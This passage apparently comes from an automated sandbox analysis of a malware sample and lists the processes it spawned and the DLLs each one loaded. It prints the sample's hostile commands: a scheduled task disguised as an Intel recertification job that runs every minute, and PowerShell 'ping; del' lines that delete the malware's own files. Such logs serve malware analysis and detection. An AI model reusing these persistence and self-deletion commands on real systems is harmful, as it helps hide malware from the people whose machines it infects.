                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeProcess created: unknown unknown
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\mode.comSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\System32\mode.comSection loaded: ureg.dllJump to behavior
                    Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeSection loaded: apphelp.dll
                    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                    Source: C:\Windows\explorer.exeSection loaded: msvcp140.dll
                    Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                    Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                    Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                    Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                    Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
                    Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\explorer.exeSection loaded: napinsp.dll
                    Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dll
                    Source: C:\Windows\explorer.exeSection loaded: wshbth.dll
                    Source: C:\Windows\explorer.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\explorer.exeSection loaded: winrnr.dll
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: napinsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: pnrpnsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: wshbth.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: nlaapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: winrnr.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: napinsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: pnrpnsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: wshbth.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: nlaapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: winrnr.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: dlnashext.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: wpdshext.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: msimg32.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: msvcr100.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: linkinfo.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: ntshrui.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSection loaded: cscapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: webio.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: winnsi.dll
